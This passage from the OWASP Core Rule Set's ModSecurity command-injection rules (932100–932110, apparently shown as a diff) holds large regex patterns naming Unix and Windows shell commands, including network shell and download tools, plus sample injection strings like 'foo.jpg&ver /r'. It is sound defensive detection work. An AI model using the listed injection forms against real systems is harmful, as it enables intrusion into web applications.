*|i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*y)|i[\\\\'\"]*(?:p[\\\\'\"]*(?:(?:6[\\\\'\"]*)?t[\\\\'\"]*a[\\\\'\"]*b[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*s|c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g)|r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|f[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|g[\\\\'\"]*(?:(?:e[\\\\'\"]*t[\\\\'\"]*f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c|i[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|u[\\\\'\"]*n[\\\\'\"]*z[\\\\'\"]*i[\\\\'\"]*p|d[\\\\'\"]*b)|a[\\\\'\"]*(?:(?:l[\\\\'\"]*i[\\\\'\"]*a[\\\\'\"]*s|w[\\\\'\"]*k)[\\\\'\"]*(?:\s|<|>).*|d[\\\\'\"]*d[\\\\'\"]*u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r|p[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t|r[\\\\'\"]*(?:c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|d[\\\\'\"]*(?:h[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*i[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*t|(?:i[\\\\'\"]*f[\\\\'\"]*f|u)[\\\\'\"]*(?:\s|<|>).*|(?:m[\\\\'\"]*e[\\\\'\"]*s|p[\\\\'\"]*k)[\\\\'\"]*g|o[\\\\'\"]*(?:a[\\\\'\"]*s|n[\\\\'\"]*e)|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:k[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*r|o[\\\\'\"]*r[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*(?:x[\\\\'\"]*(?:\s|<|>).*|q)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)|j[\\\\'\"]*(?:(?:a[\\\\'\"]*v[\\\\'\"]*a|o[\\\\'\"]*b[\\\\'\"]*s)[\\\\'\"]*(?:\s|<|>).*|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c)|k[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*l[\\\\'\"]*(?:a[\\\\'\"]*l[\\\\'\"]*l|(?:\s|<|>).*)|(?:G[\\\\'\"]*E[\\\\'\"]*T[\\\\'\"]*(?:\s|<|>)|\.\s).*|7[\\\\'\"]*z(?:[\\\\'\"]*[ar])?)\b" \ + "id:932100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Apache 2.2 requires configuration file lines to be under 8kB. +# Therefore, some remaining commands have been split off to a separate rule. +# For explanation of this rule, see rule 932100. +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932105.txt] +# \b" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:(?:f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*)?(?:\s|<|>).*|e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d[\\\\'\"]*(?:\s|<|>).*)|h[\\\\'\"]*(?:\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b|u[\\\\'\"]*t[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n|(?:\s|<|>).*)|o[\\\\'\"]*(?:(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|r[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|c[\\\\'\"]*a[\\\\'\"]*t)|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p[\\\\'\"]*(?:\s|<|>).*)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|(?:l[\\\\'\"]*e[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|u[\\\\'\"]*(?:(?:\s|<|>).*|d[\\\\'\"]*o)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:k[\\\\'\"]*(?:g(?:(?:[\\\\'\"]*_)?[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*o)?|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|f[\\\\'\"]*(?:\s|<|>).*)|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|e[\\\\'\"]*r[\\\\'\"]*(?:l(?:[\\\\'\"]*(?:s[\\\\'\"]*h|5))?|m[\\\\'\"]*s)|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|(?:u[\\\\'\"]*s[\\\\'\"]*h|o[\\\\'\"]*p)[\\\\'\"]*d|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*(?:\s|<|>).*)|n[\\\\'\"]*(?:c[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|(?:\s|<|>).*|a[\\\\'\"]*t)|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t|(?:\s|<|>).*)|s[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*o[\\\\'\"]*k[\\\\'\"]*u[\\\\'\"]*p|t[\\\\'\"]*a[\\\\'\"]*t)|(?:a[\\\\'\"]*n[\\\\'\"]*o|i[\\\\'\"]*c[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|(?:o[\\\\'\"]*h[\\\\'\"]*u|m[\\\\'\"]*a)[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*)?(?:\s|<|>).*|u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|(?:a[\\\\'\"]*r|c[\\\\'\"]*p|p[\\\\'\"]*m)[\\\\'\"]*(?:\s|<|>).*|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|e[\\\\'\"]*(?:l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t|e[\\\\'\"]*(?:\s|<|>).*)|i[\\\\'\"]*m[\\\\'\"]*e[\\\\'\"]*(?:o[\\\\'\"]*u[\\\\'\"]*t|(?:\s|<|>).*)|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r[\\\\'\"]*(?:\s|<|>).*)|o[\\\\'\"]*(?:u[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|u[\\\\'\"]*(?:n[\\\\'\"]*(?:l[\\\\'\"]*(?:i[\\\\'\"]*n[\\\\'\"]*k[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*m[\\\\'\"]*a)|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l)|l[\\\\'\"]*i[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*(?:\s|<|>).*)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l(?:[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w))?|(?:(?:o[\\\\'\"]*u[\\\\'\"]*n|u[\\\\'\"]*t)[\\\\'\"]*t|v)[\\\\'\"]*(?:\s|<|>).*)|x[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|(?:\s|<|>).*)|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s|t[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*m|x[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*)|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|i[\\\\'\"]*p[\\\\'\"]*(?:\s|<|>).*|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|o[\\\\'\"]*(?:p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*l|n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*(?:a[\\\\'\"]*m[\\\\'\"]*i|(?:\s|<|>).*)|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|v[\\\\'\"]*i[\\\\'\"]*(?:m[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r|p[\\\\'\"]*w)|y[\\\\'\"]*u[\\\\'\"]*m)\b" \ + "id:932105,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows command injection ] +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# A command injection takes a form such as: +# +# foo.jpg&ver /r +# foo.jpg|ver /r +# +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. +# +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in CMD syntax, such as: ; | & ` +# +# Anatomy of the regexp: +# +# 1. Starting tokens +# +# ; ;cmd +# \{ {cmd +# \| |cmd +# \|\| ||cmd +# & &cmd +# && &&cmd +# \n \ncmd +# \r \rcmd +# ` `cmd +# +# 2. Command prefixes +# +# ( (cmd) +# , ,cmd +# @ @cmd +# ' 'cmd' +# " "cmd" +# \s spacing+cmd +# +# 3. Paths +# +# [\w'\"\./]+/ /path/cmd +# [\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\ C:\Program Files\cmd +# [\^\.\w '\"/\\\\]*\\\\)?[\"\^]* \\net\share\dir\cmd +# +# 4. Quoting +# +# \" "cmd" +# \^ ^cmd +# +# 5. Extension/switches +# +# \.[\"\^]*\w+ cmd.com, cmd.exe, etc. +# /b cmd/h +# +# An effort is made to combat evasions by CMD syntax; for example, +# the following strings are valid: c^md, @cmd, "c"md. ModSecurity +# has a t:cmdLine transformation built-in to deal with some of these, +# but unfortunately, that transformation replaces ';' characters (so +# we cannot match on the start of a command) and '\' characters (so we +# have trouble matching paths). This makes the regexp more complex. +# +# This rule is case-insensitive. +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* +# [regexp assembled from util/regexp-assemble/regexp-932110.txt] +# (?:\.[\"\^]*\w+)?\b" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:m[\"\^]*(?:y[\"\^]*s[\"\^]*q[\"\^]*l(?:[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p(?:[\"\^]*s[\"\^]*l[\"\^]*o[\"\^]*w)?|h[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*h[\"\^]*o[\"\^]*w))?|s[\"\^]*(?:i[\"\^]*(?:n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2|e[\"\^]*x[\"\^]*e[\"\^]*c)|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|g[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*c)|o[\"\^]*(?:u[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|v[\"\^]*o[\"\^]*l)|v[\"\^]*e[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r|[dr][\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*i[\"\^]*n[\"\^]*k)|d[\"\^]*(?:s[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*d|(?:[\s,;]|\.|/|<|>).*)|a[\"\^]*p[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*d|b[\"\^]*s[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*i|e[\"\^]*a[\"\^]*s[\"\^]*u[\"\^]*r[\"\^]*e|m[\"\^]*s[\"\^]*y[\"\^]*s)|d[\"\^]*(?:i[\"\^]*(?:s[\"\^]*k[\"\^]*(?:(?:m[\"\^]*g[\"\^]*m|p[\"\^]*a[\"\^]*r)[\"\^]*t|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|r[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*e)|f[\"\^]*f[\"\^]*(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*(?:l[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*f|t[\"\^]*r[\"\^]*e[\"\^]*e|(?:[\s,;]|\.|/|<|>).*)|v[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c[\"\^]*o[\"\^]*n)|(?:f[\"\^]*r[\"\^]*a|b[\"\^]*u)[\"\^]*g)|s[\"\^]*(?:a[\"\^]*(?:c[\"\^]*l[\"\^]*s|d[\"\^]*d)|q[\"\^]*u[\"\^]*e[\"\^]*r[\"\^]*y|m[\"\^]*o[\"\^]*(?:v[\"\^]*e|d)|g[\"\^]*e[\"\^]*t|r[\"\^]*m)|(?:r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r|o[\"\^]*s[\"\^]*k[\"\^]*e)[\"\^]*y|(?:c[\"\^]*o[\"\^]*m[\"\^]*c[\"\^]*n[\"\^]*f|x[\"\^]*d[\"\^]*i[\"\^]*a)[\"\^]*g|a[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|n[\"\^]*s[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|c[\"\^]*(?:o[\"\^]*(?:m[\"\^]*(?:p[\"\^]*(?:(?:a[\"\^]*c[\"\^]*t[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|m[\"\^]*g[\"\^]*m[\"\^]*t)|e[\"\^]*x[\"\^]*p)|n[\"\^]*(?:2[\"\^]*p|v[\"\^]*e)[\"\^]*r[\"\^]*t|p[\"\^]*y)|l[\"\^]*(?:e[\"\^]*a[\"\^]*(?:n[\"\^]*m[\"\^]*g[\"\^]*r|r[\"\^]*m[\"\^]*e[\"\^]*m)|u[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*r)|h[\"\^]*(?:k[\"\^]*(?:n[\"\^]*t[\"\^]*f[\"\^]*s|d[\"\^]*s[\"\^]*k)|d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|s[\"\^]*(?:c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|c[\"\^]*m[\"\^]*d)|v[\"\^]*d[\"\^]*e)|e[\"\^]*r[\"\^]*t[\"\^]*(?:u[\"\^]*t[\"\^]*i[\"\^]*l|r[\"\^]*e[\"\^]*q)|a[\"\^]*(?:l[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|c[\"\^]*l[\"\^]*s)|m[\"\^]*d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|i[\"\^]*p[\"\^]*h[\"\^]*e[\"\^]*r|u[\"\^]*r[\"\^]*l)|f[\"\^]*(?:o[\"\^]*r[\"\^]*(?:m[\"\^]*a[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*n[\"\^]*d[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|s[\"\^]*t[\"\^]*r)|s[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*(?:p[\"\^]*(?:[\s,;]|\.|/|<|>).*|y[\"\^]*p[\"\^]*e)|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|c[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*r[\"\^]*e[\"\^]*p)|n[\"\^]*(?:e[\"\^]*t[\"\^]*(?:s[\"\^]*(?:t[\"\^]*a[\"\^]*t|v[\"\^]*c|h)|(?:[\s,;]|\.|/|<|>).*|c[\"\^]*a[\"\^]*t|d[\"\^]*o[\"\^]*m)|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|r[\"\^]*i[\"\^]*g[\"\^]*h[\"\^]*t[\"\^]*s)|(?:s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u|m[\"\^]*a)[\"\^]*p|c[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|a[\"\^]*t)|b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|e[\"\^]*(?:x[\"\^]*p[\"\^]*(?:a[\"\^]*n[\"\^]*d[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*(?:c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e|v[\"\^]*w[\"\^]*r)|n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|g[\"\^]*r[\"\^]*e[\"\^]*p|r[\"\^]*a[\"\^]*s[\"\^]*e|c[\"\^]*h[\"\^]*o)|g[\"\^]*(?:a[\"\^]*t[\"\^]*h[\"\^]*e[\"\^]*r[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*w[\"\^]*o[\"\^]*r[\"\^]*k[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*(?:(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l|e[\"\^]*d[\"\^]*i)[\"\^]*t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|i[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*t[\"\^]*m[\"\^]*a[\"\^]*c)|i[\"\^]*(?:r[\"\^]*b(?:[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))?|f[\"\^]*m[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*e[\"\^]*r|p[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|n[\"\^]*e[\"\^]*t[\"\^]*c[\"\^]*p[\"\^]*l|c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s)|a[\"\^]*(?:d[\"\^]*(?:d[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*s|m[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*m[\"\^]*d)|r[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*t[\"\^]*r[\"\^]*i[\"\^]*b|s[\"\^]*s[\"\^]*o[\"\^]*c|z[\"\^]*m[\"\^]*a[\"\^]*n)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*i[\"\^]*m[\"\^]*e|m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f)|a[\"\^]*b[\"\^]*e[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*r[\"\^]*m[\"\^]*g[\"\^]*r)|b[\"\^]*(?:(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)|r[\"\^]*o[\"\^]*w[\"\^]*s[\"\^]*t[\"\^]*a)[\"\^]*t|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|o[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*f[\"\^]*g)|h[\"\^]*(?:o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e|d[\"\^]*w[\"\^]*w[\"\^]*i[\"\^]*z)|j[\"\^]*a[\"\^]*v[\"\^]*a[\"\^]*(?:[\s,;]|\.|/|<|>).*|7[\"\^]*z(?:[\"\^]*[ar])?)(?:\.[\"\^]*\w+)?\b" \ + "id:932110,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Apache 